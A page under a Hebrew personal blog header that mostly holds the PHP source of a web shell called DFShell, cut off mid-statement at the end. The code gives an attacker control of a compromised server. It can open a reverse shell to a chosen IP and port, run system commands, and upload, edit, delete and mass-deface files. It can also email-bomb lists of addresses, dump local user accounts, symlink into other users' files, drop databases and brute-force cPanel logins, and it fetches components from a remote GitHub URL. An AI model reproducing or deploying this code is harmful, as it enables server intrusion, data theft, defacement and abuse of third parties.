הבלוג של אורי עידן

כתיבה, שייט תוכנה חופשית ומה שבינהם

array('pipe', 'r'), // shell can read from STDIN 1 => array('pipe', 'w'), // shell can write to STDOUT 2 => array('pipe', 'w') // shell can write to STDERR ); private $buffer = 1024; private $clen = 0; private $error = false; static protected $pass = "OI2lo2eG+xkgYPhmurVfWAsDHBx31O1qAoH2J2LkX7c="; //DF_Malaysia@1337$ static protected $remote_url = "https://raw.githubusercontent.com/EagleTube/DFS/main/contents"; public function __construct(){ $_SESSION['latest'] = $GLOBALS['DFSyntax'][0](self::$remote_url . "/version.txt"); $_SESSION['need_update'] = false; if(doubleval($_SESSION['latest'])!==$GLOBALS['DFShell_Ver']){ $_SESSION['need_update'] = true; } } public function DFSPopupMSG($no,$title,$msg,$foot,$x){ if($x){ $location = "window.location.replace(window.location.href)"; }else{ $location = "window.history.back()"; } if(isset($GLOBALS['DFConfig'][0]['dfp']) && isset($GLOBALS['DFConfig'][0]['dff'])){ $slocation = "window.location.replace('?dfp=".$GLOBALS['DFConfig'][0]['dfp']."')"; }else{ $slocation = "window.location.replace('".$GLOBALS['DFConfig'][2]['PHP_SELF']."')"; } switch($no){ case 1: $script = ""; print($script); break; case 2: $script = ""; print($script); break; case 3: $script = ""; print($script); break; case 4: $script = ""; print($script); break; case 5: $script = ""; print($script); break; } } function __call($method, $arg){ if(isset($method) && isset($arg)){ $arg[0]($arg[1]); //upcoming CNC ddos } } private function triggered(){ print("Place where magic happend!"); } public function Enc() { $this->iv_length = openssl_cipher_iv_length($this->ciphering); $this->output = openssl_encrypt($this->string,$this->ciphering,sha1($this->keys),$this->options,$this->iv); return $this->output; } public function Dec($enc) { $this->output = openssl_decrypt($enc,$this->ciphering,sha1($this->keys),$this->options,$this->iv); return $this->output; } public function DFSLogin($password){ $login_pass = $this->Dec(urldecode($password)); if($login_pass === $this->Dec(self::$pass)){ $_SESSION['DFS_Auth']=sha1($GLOBALS['DFConfig'][2]['REMOTE_ADDR']); setrawcookie('DFSVersion',$GLOBALS['DFShell_Ver'],(time()+18000),'/',$GLOBALS['DFConfig'][2]['HTTP_HOST'],1,1); return true; }else{ echo ""; //echo $login_pass; return false; } } public function DFSSlash(){ if($GLOBALS['DFSPlatform']!=='win'){ $slashtype = "/"; }else{ $slashtype = "\"; } return $slashtype; } public function DFSFormat($bytes) { if ($bytes >= 1073741824) { $bytes = number_format($bytes / 1073741824, 2) . ' GB'; } elseif ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2) . ' MB'; } elseif ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . ' KB'; } elseif ($bytes > 1) { $bytes = $bytes . ' B'; } else { $bytes = '0 bytes'; } return $bytes; } ########## REVERSHELL> CREDIT : https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php ######### private function rw($input, $output, $iname, $oname) { while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) { if ($GLOBALS['DFSPlatform'] === 'WINDOWS' && $oname === 'STDIN') { $this->clen += strlen($data); } } } private function brw($input, $output, $iname, $oname) { $fstat = fstat($input); $size = $fstat['size']; if ($GLOBALS['DFSPlatform'] === 'lin' && $iname === 'STDOUT' && $this->clen) { while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) { $this->clen -= $bytes; $size -= $bytes; } } while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) { $size -= $bytes; } } private function read($stream, $name, $buffer) { if (($data = @fread($stream, $buffer)) === false) { $this->error = true; echo "
STRM_ERROR: Cannot read from {$name}, script will now exit...
"; } return $data; } private function write($stream, $name, $data) { if (($bytes = @fwrite($stream, $data)) === false) { $this->error = true; echo "
STRM_ERROR: Cannot write to {$name}, script will now exit...
"; } return $bytes; } public function DFSReverse($ip,$port){ $exit = false; if($GLOBALS['DFSPlatform']!=='lin'){ $exec = 'cmd.exe'; }else{ $exec = '/bin/sh'; } if (!$GLOBALS['DFSyntax'][5]('pcntl_fork')) { echo "DAEMONIZE: pcntl_fork() does not exists, moving on..."; } else if (($pid = @$GLOBALS['DFSyntax'][7]()) < 0) { echo "DAEMONIZE: Cannot fork off the parent process, moving on..."; } else if ($pid > 0) { $exit = true; echo "DAEMONIZE: Child process forked off successfully, parent process will now exit..."; } else if ($GLOBALS['DFSyntax'][12]() < 0) { echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan..."; } else { echo "DAEMONIZE: Completed successfully!"; } if(!$exit){ @set_time_limit(0); @umask(0); $socket = @$GLOBALS['DFSyntax'][6]($ip, $port, $errno, $errstr, 30); if(!$socket){ echo "Erro Socket! -> {$errno}: {$errstr}"; }else{ $GLOBALS['DFSyntax'][8]($socket, false); $process = @$GLOBALS['DFSyntax'][10]($exec, $this->descriptorspec, $pipes, null, null); if (!$process) { echo "PROC_ERROR: Cannot start the shell"; }else{ foreach ($pipes as $pipe) { $GLOBALS['DFSyntax'][8]($pipe, false); } $status = $GLOBALS['DFSyntax'][9]($process); @fwrite($socket, "SOCKET: Shell has connected! PID: {$status['pid']}"); do { $status = $GLOBALS['DFSyntax'][9]($process); if (feof($socket)) { echo "SOC_ERROR: Shell connection has been terminated"; break; } else if (feof($pipes[1]) || !$status['running']) { echo "PROC_ERROR: Shell process has been terminated"; break; } $streams = array( 'read' => array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR 'write' => null, 'except' => null ); $num_changed_streams = @$GLOBALS['DFSyntax'][13]($streams['read'], $streams['write'], $streams['except'], 0); if ($num_changed_streams === false) { echo "STRM_ERROR: stream_select() failed"; break; } else if ($num_changed_streams > 0) { if ($GLOBALS['DFSPlatform'] === 'lin') { if (in_array($socket , $streams['read'])) { $this->rw($socket , $pipes[0], 'SOCKET', 'STDIN' ); } if (in_array($pipes[2], $streams['read'])) { $this->rw($pipes[2], $socket , 'STDERR', 'SOCKET'); } if (in_array($pipes[1], $streams['read'])) { $this->rw($pipes[1], $socket , 'STDOUT', 'SOCKET'); } } else if ($GLOBALS['DFSPlatform'] === 'win') { if (in_array($socket, $streams['read'])/*------*/) { $this->rw ($socket , $pipes[0], 'SOCKET', 'STDIN' ); } if (($fstat = fstat($pipes[2])) && $fstat['size']) { $this->brw($pipes[2], $socket , 'STDERR', 'SOCKET'); } if (($fstat = fstat($pipes[1])) && $fstat['size']) { $this->brw($pipes[1], $socket , 'STDOUT', 'SOCKET'); } } } } while (!$this->error); foreach ($pipes as $pipe) { fclose($pipe); } $GLOBALS['DFSyntax'][11]($process); } fclose($socket); } } } ####### END REVERSHELL ######## public function DFSAction($action){ switch(strtolower($action)){ case "download": $slashtype = $this->DFSSlash(); $pathfile = $this->Dec(($this->query[0])) . $this->Dec(($this->query[1])); $pathfile = $this->Dec($this->DFSDirFilter($pathfile)); if( file_exists($pathfile) ){ $type = mime_content_type($pathfile) ?: 'text/plain'; header("Content-Type: ".$type); header('Content-Description: File Transfer'); header("Content-Length: ".filesize($pathfile)); header('Content-Disposition: attachment; filename="'.basename($pathfile).'"'); $GLOBALS['DFSyntax'][2]($pathfile); }else{ echo ""; } break; case "chmd": $slashtype = $this->DFSSlash(); $this->DFSCurrent($slashtype); if(isset($this->query)){ $dirmod = $this->Dec($this->query[0]); $filmod = ""; if(isset($this->query[1])){ $filmod = $this->Dec($this->query[1]); } $_cmod = $this->DFSMod(fileperms($dirmod . $filmod)); echo "

Location : $dirmod$filmod

"; echo "

"; if(isset($GLOBALS['DFConfig'][1]['cmod'])){ if($this->DFSChange($dirmod . $filmod,$GLOBALS['DFConfig'][1]['modf'])){ echo ""; }else{ echo ""; } } } break; case "bombing": echo "

Email Bombing

"; if(isset($GLOBALS['DFConfig'][1]['mail_list']) && isset($GLOBALS['DFConfig'][1]['mail_text'])){ $emails = explode("",$GLOBALS['DFConfig'][1]['mail_list']); $message = $GLOBALS['DFConfig'][1]['mail_text']; $subject = $GLOBALS['DFConfig'][1]['mail_subject']; $headers = "From: ".$GLOBALS['DFConfig'][2]['SERVER_ADMIN']; foreach($emails as $email){ $email = preg_replace("/s+/i","",$email); if(@mail($email,$subject,$message,$headers)){ print("Email sent -> ".$email."
"); }else{ print("Failed -> ".$email."
"); } } } echo "

"; break; case "massdel": //upcoming if(isset($GLOBALS['DFConfig'][1]['selectAction'])){ if($GLOBALS['DFConfig'][1]['selectAction']==="Delete") if(!empty($GLOBALS['DFConfig'][1]['toZip'])){ if(isset($GLOBALS['DFConfig'][0]['dfp'])){ $delPath = $this->Dec($GLOBALS['DFConfig'][0]['dfp']) . $slashtype; }else{ $delPath = ""; } $toDel = $GLOBALS['DFConfig'][1]['toZip']; for($i=0;$iDec(urldecode($mdel[0])); $mdel_item = $this->Dec(urldecode($mdel[1])); if(file_exists($mdel_dir . $mdel_item)){ if(is_dir($mdel_dir . $mdel_item)){ @rmdir($mdel_dir . $mdel_item); } if(is_file($mdel_dir . $mdel_item)){ @unlink($mdel_dir . $mdel_item); } } } $this->DFSPopupMSG(3,null,"Selected file deleted!",null,true); }else{ $this->DFSPopupMSG(4,null,"No file deleted!",null,true); } } break; case "zipping": $ziproc = new ZipArchive; $slashtype = $this->DFSSlash(); if(isset($GLOBALS['DFConfig'][1]['selectAction'])){ if($GLOBALS['DFConfig'][1]['selectAction']==="Zip") if(empty($GLOBALS['DFConfig'][1]['toZip'])){ print(""); }else{ $toZip = $GLOBALS['DFConfig'][1]['toZip']; $zipXname = md5(time()) . ".zip"; if(isset($GLOBALS['DFConfig'][0]['dfp'])){ $zipdirname = $this->Dec($GLOBALS['DFConfig'][0]['dfp']) . $slashtype . $zipXname; }else{ $zipdirname = $zipXname; } if($ziproc -> open($zipdirname, ZipArchive::CREATE | ZipArchive::OVERWRITE)){ for($i=0;$iDec(urldecode($mzip[0])) . $slashtype; $recdir = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($dirtozip), RecursiveIteratorIterator::LEAVES_ONLY ); foreach ($recdir as $name => $file) { if (!$file->isDir()) { $filePath = $file->getRealPath(); $relativePath = substr($filePath, strlen($dirtozip)); $ziproc->addFile($filePath, $relativePath); } } }else{ $filetozip = $this->Dec(urldecode($mzip[0])) . $slashtype . $this->Dec(urldecode($mzip[1])); $ziproc->addFile($filetozip,$this->Dec(urldecode($mzip[1]))); } } echo ""; $ziproc ->close(); } } } break; case "upload": $slashtype = $this->DFSSlash(); if(!isset($this->query[0])){ $path = getcwd() . $slashtype; }else{ $path = $this->Dec(($this->query[0])) ?: getcwd() . $slashtype; } $path = $this->Dec($this->DFSDirFilter($path)) . $slashtype; if(isset($GLOBALS['DFConfig'][1]['dfupload'])){ if(move_uploaded_file($GLOBALS['DFConfig'][4]['dffile']['tmp_name'],$path.$GLOBALS['DFConfig'][4]['dffile']['name'])){ $this->DFSPopupMSG(3,null,"File uploaded!",null,true); }else{ $this->DFSPopupMSG(4,null,"Permission denied!",null,true); } } break; case "dest": $slashtype = $this->DFSSlash(); if(!isset($GLOBALS['DFConfig'][1]['destroy'])){ echo "

"; }else{ $DFS_SHELL = $GLOBALS['DFConfig'][2]['DOCUMENT_ROOT'] . $slashtype . $GLOBALS['DFConfig'][2]['PHP_SELF']; if(unlink($DFS_SHELL)){ $this->DFSPopupMSG(3,null,"File destroyed!!",null,false); }else{ $this->DFSPopupMSG(4,null,"Unable destroyed!!",null,true); } } break; case "edit": $slashtype = $this->DFSSlash(); $this->DFSCurrent($slashtype); $pathfile = $this->Dec(($this->query[0])) . $this->Dec(($this->query[1])); $pathfile = $this->Dec($this->DFSDirFilter($pathfile)); if(!isset($GLOBALS['DFConfig'][1]['dfedit'])){ echo "

"; echo "

"; }else{ $pto = fopen($pathfile,'w'); fwrite($pto,$GLOBALS['DFConfig'][1]['editx']); fclose($pto); $this->DFSPopupMSG(3,null,"Saved!",null,true); } break; case "view": $slashtype = $this->DFSSlash(); $this->DFSCurrent($slashtype); $pathfile = $this->Dec(($this->query[0])) . $this->Dec(($this->query[1])); $pathfile = $this->Dec($this->DFSDirFilter($pathfile)); echo "

Filename -> ".$this->Dec(($this->query[1]))."

"; echo "

"; show_source($pathfile); echo "

"; break; case "mkfile": $slashtype = $this->DFSSlash(); if(isset($GLOBALS['DFConfig'][1]['createfile'])){ $fname = $GLOBALS['DFConfig'][1]['newfile'] ?: 'newfile.txt'; $fcreate = fopen($this->Dec(($this->query[0])).$slashtype.$fname,'w'); fwrite($fcreate,""); fclose($fcreate); $this->DFSPopupMSG(3,null,"File created!",null,true); } break; case "mkdir": $slashtype = $this->DFSSlash(); if(isset($GLOBALS['DFConfig'][1]['createfolder'])){ $fname = $GLOBALS['DFConfig'][1]['newfolder'] ?: 'newfolder'; if(!file_exists($fname)){ if(mkdir($this->Dec(($this->query[0])).$slashtype.$fname)){ $this->DFSPopupMSG(3,null,"Folder created!",null,true); }else{ $this->DFSPopupMSG(4,null,"Permission denied!",null,true); } }else{ $this->DFSPopupMSG(4,null,"Folder existed!",null,true); } } break; case "cmd": $slashtype = $this->DFSSlash(); $this->DFSCurrent($slashtype); echo "

"; echo ""; echo "

"; break; case "sym": echo "

Example : /home/%{user}%/public_html/target_file.php || /var/www/%{user}%/html/file.php

"; echo ""; echo "
"; echo ""; echo ""; echo ""; echo "

Symlink home&file target :
Saved to path :
Saved as :

"; if(isset($GLOBALS['DFConfig'][1]['dfssym'])){ if($GLOBALS['DFSPlatform']!=='win'){ if(!file_exists('sym')) { mkdir($GLOBALS['DFConfig'][1]['path'].'/sym'); } $contents = $GLOBALS['DFSyntax'][0](self::$remote_url . "/htaccess.txt"); for ($uid = 0; $uid < 4000; $uid++){ $nothing = posix_getpwuid($uid); if (!empty($nothing)){ if(!file_exists($GLOBALS['DFConfig'][1]['path'].'/sym/'.$nothing['name'])){ mkdir($GLOBALS['DFConfig'][1]['path'].'/sym/'.$nothing['name']); $targetpath = $this->DFSRender('/%{user}%/i',$nothing['name'],base64_decode(urldecode($GLOBALS['DFConfig'][1]['target']))); if(isset($targetpath)){ $this->DFSExecute("ln -s ".$targetpath.' '.$GLOBALS['DFConfig'][1]['path'].'/sym/'.$nothing['name'].'/'.$GLOBALS['DFConfig'][1]['dfsaved']); symlink($targetpath, $GLOBALS['DFConfig'][1]['path'].'/sym/'.$nothing['name'].'/'.$GLOBALS['DFConfig'][1]['dfsaved']); $user_ht = fopen($GLOBALS['DFConfig'][1]['path'].'/sym/'.$nothing['name'].'/.htaccess','w'); fwrite($user_ht,$this->DFSRender('/%{user}%/i',$GLOBALS['DFConfig'][1]['dfsaved'],$contents)); fclose($user_ht); $dfsv = urlencode($GLOBALS['DFConfig'][1]['path'].'/sym/'.$nothing['name'].'/'.$GLOBALS['DFConfig'][1]['dfsaved']); print("Done! -> ".$nothing['name']." -> Open
"); } }else{ $targetpath = $this->DFSRender('/%{user}%/i',$nothing['name'],base64_decode(urldecode($GLOBALS['DFConfig'][1]['target']))); if(isset($targetpath)){ $this->DFSExecute("ln -s ".$targetpath.' '.$GLOBALS['DFConfig'][1]['path'].'/sym/'.$nothing['name'].'/'.$GLOBALS['DFConfig'][1]['dfsaved']); symlink($targetpath, $GLOBALS['DFConfig'][1]['path'].'/sym/'.$nothing['name'].'/'.$GLOBALS['DFConfig'][1]['dfsaved']); $user_ht = fopen($GLOBALS['DFConfig'][1]['path'].'/sym/'.$nothing['name'].'/.htaccess','w'); fwrite($user_ht,$this->DFSRender('/%{user}%/i',$GLOBALS['DFConfig'][1]['dfsaved'],$contents)); fclose($user_ht); $dfsv = urlencode($GLOBALS['DFConfig'][1]['path'].'/sym/'.$nothing['name'].'/'.$GLOBALS['DFConfig'][1]['dfsaved']); print("Done! -> ".$nothing['name']." -> Open
"); } } } } }else{ echo "Not work in window!"; } } echo "

"; break; case "reverse": $revhtml = explode('||',$GLOBALS['DFSyntax'][0](self::$remote_url.'/others.html'))[1]; echo "

"; if(!isset($GLOBALS['DFConfig'][1]['dfsrev'])){ echo $revhtml; }else{ echo $revhtml; echo "

";
                    $addr = trim($GLOBALS['DFConfig'][1]['dfsaddr']);
                    $port = trim($GLOBALS['DFConfig'][1]['dfsport']);
                    $this->DFSReverse($addr,$port);
                    echo "

"; } echo "

"; break; case "conf": echo "

"; $pwid = array(); if($GLOBALS['DFSPlatform']!=='win'){ for ($uid = 0; $uid < 4000; $uid++){ $nothing = posix_getpwuid($uid); if (!empty($nothing)){ array_push($pwid,$nothing['name'].':'.$nothing['passwd'].':'.$nothing['uid'].':'.$nothing['gid'].':'.$nothing['dir'].':'.$nothing['shell']); } } foreach($pwid as $conf){ print($conf."
"); } }else{ echo "Not work in window!"; } echo "

"; break; case "unzip": $from = $this->Dec($GLOBALS['DFConfig'][0]['dfp']); $zipp = $this->Dec($GLOBALS['DFConfig'][0]['dff']); echo "

"; if(isset($GLOBALS['DFConfig'][1]['destination'])){ $ziproc = new ZipArchive; $pth = $from.$zipp; if ($ziproc->open($pth) === TRUE) { // Unzip Path $ziproc->extractTo($GLOBALS['DFConfig'][1]['destination']); $ziproc->close(); $this->DFSPopupMSG(3,null,"File successfully extracted to destination!",null,false); } else { $this->DFSPopupMSG(4,null,"Failed to extract into destination!",null,false); } }else{ echo "Filename : ".$from.$zipp.""; echo ""; echo ""; echo "

Destination :

"; } echo "

"; break; case "scand": $slashtype = $this->DFSSlash(); $path = $this->Dec(($this->query[0])). $slashtype; $path = $this->Dec($this->DFSDirFilter($path)); $this->DFSCurrent($slashtype); echo "

"; echo ""; $folder = array_diff(scandir($path),['.','..']); $files = scandir($path); foreach($folder as $p){ if(is_dir($path . $slashtype . $p)){ $filtered = $this->Dec($this->DFSDirFilter($path)); $this->string = $filtered . $p; $uid = explode(':',$this->DFSOG($filtered.$slashtype.$p)); //$og = posix_getpwuid($uid[0]); echo "

"; echo ""; echo ""; echo ""; echo ""; echo ""; echo "

"; } } foreach($files as $p){ if(is_file($path . $slashtype . $p)){ $filtered = $this->Dec($this->DFSDirFilter($path)); $this->string = $filtered; $dfp = $this->Enc(); $this->string = $p; $dff = $this->Enc(); $compressed = array("zip","tar","gz","rar"); $isZip = pathinfo($p,PATHINFO_EXTENSION); if(in_array($isZip,$compressed)){ $tname = $p . ""; }else{ $tname = $p; } echo "

"; echo ""; echo ""; echo ""; echo ""; echo ""; echo "

"; } } echo "

Pick	Type	Name	Size	Owner:Groups	Perms	Modified	Action
		$p		".$this->DFSOG($filtered . $slashtype . $p)."	".$this->DFSPerms($filtered . $slashtype . $p)."	".date("h:i:sA(d/m/Y)",filemtime($filtered . $slashtype . $p))."	.
		$tname	".$this->DFSFormat(filesize($filtered.$p))."	".$this->DFSOG($filtered.$p)."	".$this->DFSPerms($filtered.$p)."	".date("h:i:sA(d/m/Y)",filemtime($filtered.$p))."	. . .

"; break; case "del": $slashtype = $this->DFSSlash(); $pathfile = $this->Dec(($this->query[0])) . $this->Dec(($this->query[1]?:'')); $pathfile = $this->Dec($this->DFSDirFilter($pathfile)); if(is_file($pathfile)){ if(unlink($pathfile)){ $this->DFSPopupMSG(3,null,"File Successfully deleted!",null,false); }else{ $this->DFSPopupMSG(4,null,"Permission denied!",null,false); } }else if(is_dir($pathfile)){ if(rmdir($pathfile)){ $this->DFSPopupMSG(3,null,"Directory Successfully deleted!",null,false); }else{ $this->DFSPopupMSG(4,null,"Permission denied!",null,false); } } break; case "ren": $slashtype = $this->DFSSlash(); $pathfile = $this->Dec(($this->query[0])) . $this->Dec(($this->query[1])); $pathfile = $this->Dec($this->DFSDirFilter($pathfile)); if(getcwd()==$pathfile){ $GLOBALS['DFSyntax'][3]($GLOBALS['DFConfig'][2]['DOCUMENT_ROOT']); } echo "

"; if(isset($GLOBALS['DFConfig'][1]['newfile'])){ if(file_exists($pathfile)){ $dfsRen = preg_replace("/".basename($pathfile)."/i",$GLOBALS['DFConfig'][1]['newfile'],$pathfile); if(rename($pathfile,$dfsRen)){ $this->DFSPopupMSG(5,"","File successfully renamed!","",true); echo ""; }else{ $this->DFSPopupMSG(4,null,"Permission denied!",null,true); } }else{ $this->DFSPopupMSG(4,null,"No such file/directory!",null,true); } }else{ $dfsren = preg_replace("/".basename($pathfile)."/i","",$pathfile); $this->string = $dfsren; echo ""; } echo "

"; break; case "sql": echo "

"; if(isset($_SESSION['sql_auth'])){ $sqldat = explode('|--|',$_SESSION['sql_auth']); $conn = mysqli_connect($sqldat[0],$sqldat[1],$sqldat[2]); if(isset($GLOBALS['DFConfig'][1]['other'])){ $this->DFSPopupMSG(1,"Get Adminer","Please get adminer from link below","Adminer",true); }else if(isset($GLOBALS['DFConfig'][1]['sqldrop'])){ $ftar = array("'",'"'); if(!isset($GLOBALS['DFConfig'][0]['tbname'])){ mysqli_select_db($conn,$GLOBALS['DFConfig'][0]['dbname']); $dropping = str_replace($ftar,"",$GLOBALS['DFConfig'][0]['dbname']); $dropsql = "DROP DATABASE $dropping"; $query = mysqli_query($conn,$dropsql) or exit(mysqli_error($conn)); $this->DFSPopupMSG(3,null,"Database DROPPED!",null,false); }else{ mysqli_select_db($conn,$GLOBALS['DFConfig'][0]['dbname']); $dropping = str_replace($ftar,"",$GLOBALS['DFConfig'][0]['tbname']); $dropsql = "DROP TABLE $dropping"; $query = mysqli_query($conn,$dropsql) or exit(mysqli_error($conn)); $this->DFSPopupMSG(3,null,"Table DROPPED!",null,false); } }else if(isset($GLOBALS['DFConfig'][1]['sqlcommands'])){ if(isset($GLOBALS['DFConfig'][0]['dbname'])){ mysqli_select_db($conn,$GLOBALS['DFConfig'][0]['dbname']); $inject = $GLOBALS['DFConfig'][1]['sqlcommands']; $query = mysqli_query($conn,$inject) or exit(mysqli_error($conn)); $this->DFSPopupMSG(3,null,"Command executed!",null,false); }else{ $inject = $GLOBALS['DFConfig'][1]['sqlcommands']; $query = mysqli_query($conn,$inject) or exit(mysqli_error($conn)); $this->DFSPopupMSG(3,null,"Command executed!",null,false); } }else{ echo "

"; if(isset($GLOBALS['DFConfig'][0]['tbname']) || isset($GLOBALS['DFConfig'][0]['dbname'])){ echo ""; } echo "

"; echo "

Connected to mysql
"; if(!isset($GLOBALS['DFConfig'][0]['dbname'])){ echo "
"; }else{ if(!isset($GLOBALS['DFConfig'][0]['tbname'])){ echo "
"; }else{ echo "
"; } } if(isset($GLOBALS['DFConfig'][0]['dbname'])){ $dbs = mysqli_real_escape_string($conn,$GLOBALS['DFConfig'][0]['dbname']); $sql = "select table_name from information_schema.tables where table_schema='$dbs';"; $query = mysqli_query($conn,$sql) or exit(mysqli_error($conn)); while($fetch = mysqli_fetch_assoc($query)){ echo "". $fetch['table_name'] . "
"; } echo "

"; if(isset($GLOBALS['DFConfig'][0]['tbname'])){ if(!isset($GLOBALS['DFConfig'][0]['limit'])){ mysqli_select_db($conn,$dbs); $tbl = mysqli_real_escape_string($conn,$GLOBALS['DFConfig'][0]['tbname']); $sql = "select column_name from information_schema.columns where table_name='$tbl'"; $sql1 = "select * from $tbl limit 20"; $query = mysqli_query($conn,$sql) or exit(mysqli_error($conn)); $query1 = mysqli_query($conn,$sql1) or exit(mysqli_error($conn)); echo ""; while($fetch=mysqli_fetch_assoc($query)){ echo ""; } while($fetch1=mysqli_fetch_assoc($query1)){ echo ""; foreach($fetch1 as $key => $val){ echo ""; } echo ""; } $total_row=mysqli_num_rows($query1); echo "

".$fetch['column_name']."
".$val."

"; if($total_row>0){ echo ""; } echo "

"; }else{ $limits = explode(',',$GLOBALS['DFConfig'][0]['limit']); $offset = intval($limits[0]); $limit = intval($limits[1]); mysqli_select_db($conn,$dbs); $tbl = mysqli_real_escape_string($conn,$GLOBALS['DFConfig'][0]['tbname']); $sql = "select column_name from information_schema.columns where table_name='$tbl'"; $sql1 = "select * from $tbl limit $offset,$limit"; $query = mysqli_query($conn,$sql) or exit(mysqli_error($conn)); $query1 = mysqli_query($conn,$sql1) or exit(mysqli_error($conn)); echo ""; while($fetch=mysqli_fetch_assoc($query)){ echo ""; } while($fetch1=mysqli_fetch_assoc($query1)){ echo ""; foreach($fetch1 as $key => $val){ echo ""; } echo ""; } echo "

".$fetch['column_name']."
".$val."

"; $total_row=mysqli_num_rows($query1); if($total_row>0){ echo ""; } echo"

"; } } }else{ $sql = "select schema_name from information_schema.schemata"; $query = mysqli_query($conn,$sql) or exit(mysqli_error($conn)); while($fetch = mysqli_fetch_assoc($query)){ echo "". $fetch['schema_name'] . "
"; } echo "

"; } if(isset($GLOBALS['DFConfig'][1]['sqllogout'])){ $_SESSION['sql_auth'] = null; unset($_SESSION['sql_auth']); echo ""; } if(isset($GLOBALS['DFConfig'][1]['sqlcmd'])){ $sqlcmd = $GLOBALS['DFConfig'][1]['sqlcmd']; $qrycmd = mysqli_query($conn,$sqlcmd) or exit(mysqli_error($conn)); $this->DFSPopupMSG(1,"SQL Query","Command successfully executed!","",true); } } }else{ if(!isset($GLOBALS['DFConfig'][1]['connect_sql'])){ echo explode('||',$GLOBALS['DFSyntax'][0](self::$remote_url.'/others.html'))[4]; }else{ $tmp_conn = mysqli_connect($GLOBALS['DFConfig'][1]['sqlhost'],$GLOBALS['DFConfig'][1]['sqluser'],$GLOBALS['DFConfig'][1]['sqlpass']) or exit($this->DFSPopupMSG(2,"MySQL Connection","Cannot connect to database!","",true)); if(!mysqli_connect_errno()){ $_SESSION['sql_auth'] = $GLOBALS['DFConfig'][1]['sqlhost']."|--|".$GLOBALS['DFConfig'][1]['sqluser']."|--|".$GLOBALS['DFConfig'][1]['sqlpass']; echo ""; }else{ echo "Failed to connect mysql"; exit; } } } echo ""; break; case "logout": unset($_SESSION['DFS_Auth']); session_destroy(); echo ""; break; case "crack": if(!isset($GLOBALS['DFConfig'][1]['crack'])){ echo explode('||',$GLOBALS['DFSyntax'][0](self::$remote_url.'/others.html'))[0]; }else{ $host = $GLOBALS['DFConfig'][1]['host']; $user = explode("",$GLOBALS['DFConfig'][1]['userlist']); $pass = explode("",$GLOBALS['DFConfig'][1]['passlist']); $port = $GLOBALS['DFConfig'][1]['portc']; $timeout = $GLOBALS['DFConfig'][1]['timeout']; echo "

"; foreach($user as $u){ print("

Trying for user -> ".$u."

"); foreach($pass as $p){ $this->DFSCracker(trim($host),$port,trim($u),trim($p),trim($timeout)); } } echo "

Done!

"; echo "

"; } break; case "mass": $slashtype = $this->DFSSlash(); echo "

"; if(!isset($GLOBALS['DFConfig'][1]['dfmass'])){ echo explode('||',$GLOBALS['DFSyntax'][0](self::$remote_url.'/others.html'))[2]; }else{ $arrpath = glob($GLOBALS['DFConfig'][1]['masspath'] . $slashtype . '*', GLOB_ONLYDIR); if(!empty($GLOBALS['DFConfig'][1]['fromurl']) && $GLOBALS['DFConfig'][1]['fromurl']!=="" && $GLOBALS['DFConfig'][1]['fromurl']!==NULL){ if(filter_var($GLOBALS['DFConfig'][1]['fromurl'], FILTER_VALIDATE_URL)){ $ncode = file_get_contents($GLOBALS['DFConfig'][1]['fromurl']); }else{ die(""); } }else{ $ncode = $GLOBALS['DFConfig'][1]['codemass'] ?: 'Hacked by Eagle Eye'; } $lekluh = $GLOBALS['DFConfig'][1]['masspath'] . $slashtype . $GLOBALS['DFConfig'][1]['massname']; $rakluh = fopen($lekluh,'w'); fwrite($rakluh,$ncode); foreach($arrpath as $p){ $npath = $p . $slashtype . $GLOBALS['DFConfig'][1]['massname']; $nopen = fopen($npath,'w'); fwrite($nopen,$ncode); fclose($nopen); } fclose($rakluh); $this->DFSPopupMSG(1,"Mass defacements","All file successfully created!","",true); } echo "

"; break; } } public function DFSExecute($command){ if(isset($GLOBALS['DFConfig'][0]['dfp'])){ $GLOBALS['DFSyntax'][3]($this->Dec($GLOBALS['DFConfig'][0]['dfp'])); }else{ $GLOBALS['DFSyntax'][3]($GLOBALS['DFConfig'][2]['DOCUMENT_ROOT']); } if($this->DFSDat('ini','disable_functions')!=="None"){ $disCMD = explode(",",$this->DFSDat('ini','disable_functions')); $disCMD = array_map('trim', $disCMD); foreach($GLOBALS['DFSCmd'] as $cmd){ if(!in_array($cmd,$disCMD)){ $availCMD = $cmd; switch($availCMD){ case $GLOBALS['DFSCmd'][4]: return $this->DFSProcOpen($command); break; case $GLOBALS['DFSCmd'][1]: case $GLOBALS['DFSCmd'][2]: print($availCMD($command)); return $GLOBALS['DFSCmd'][1]($command); break; default: return $availCMD($command); break; } break; } } }else{ return system($command); } } private function DFSProcOpen($command){ $descriptorspec = array( 0 => array('pipe', 'r'), // shell can read from STDIN 1 => array('pipe', 'w'), // shell can write to STDOUT 2 => array('pipe', 'w') // shell can write to STDERR ); $exec = $command; $process = $GLOBALS['DFSCmd'][4]($exec, $descriptorspec, $pipes, null, null); if(is_resource($process)){ $retCMD = $GLOBALS['DFSyntax'][14]($pipes[1]); echo $retCMD; proc_close($process); }else{ echo "Fail to execute!"; } } private function DFSWinPathCheck(){ $partition = array("A:","B:","C:","D:","E:","F:","G:","H:","I:","J:","K:","L:","M:", "N:","O:","P:","Q:","R:","S:","T:","U:","V:","W:","X:","Y:","Z:"); $available = array(); foreach($partition as $part){ if(is_dir($part)){ array_push($available,$part); } } return $available; } private function DFSCracker($host,$port,$user,$pass,$timeout){ $ch = curl_init(); $qdata = array( 'user'=>$user, 'pass'=>$pass, 'goto_uri'=>'/' ); curl_setopt($ch, CURLOPT_URL, "https://$host:" . $port . "/login/?login_only=1"); curl_setopt($ch, CURLOPT_HEADER, TRUE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $qdata); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_FAILONERROR, 1); $data = curl_exec($ch); $httpcode = 